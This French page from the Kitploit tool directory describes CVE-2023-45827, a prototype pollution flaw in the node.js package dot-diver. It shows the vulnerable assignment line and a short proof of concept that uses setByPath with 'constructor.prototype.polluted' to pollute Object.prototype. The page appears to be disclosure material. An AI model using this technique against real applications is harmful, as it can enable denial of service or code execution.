Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-45827 — pp | Kitploit
Outils/GitHubGitHub/200101whoami/cve-2023-45827
Analyse StatiqueAnalyse des VulnérabilitésAnalyse de CodeExploitationSécurité Web
GitHub200101whoami/cve-2023-45827

CVE-2023-45827

pp

Voir le dépôt
5il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-45827

Aperçu de la vulnérabilité

  • CVE-2023-45827

  • CVSS : 9.8

  • 3 novembre 2023

  • ProtoType Pollution dans le package node.js

  • Dans le cadre du projet rebob

Description de la vulnérabilité

Avis GitHub

Il s'agit d'une vulnérabilité Prototype Pollution (PP) dans dot-diver. Elle peut entraîner une RCE.

Code vulnérable

root@kitploit:~
//https://github.com/clickbar/dot-diver/tree/main/src/index.ts:277
//eslint-disable-next-line @typescript-eslint/no-unsafe-member-access
objectToSet[lastKey] = value

poc

root@kitploit:~
import { getByPath, setByPath } from '@clickbar/dot-diver'

console.log({}.polluted); // undefined
setByPath({},'constructor.prototype.polluted', 'foo');
console.log({}.polluted); // foo

C'est une Prototype Pollution (PP) et elle peut entraîner Dos, RCE, etc.

package cible

Télécharger l’outil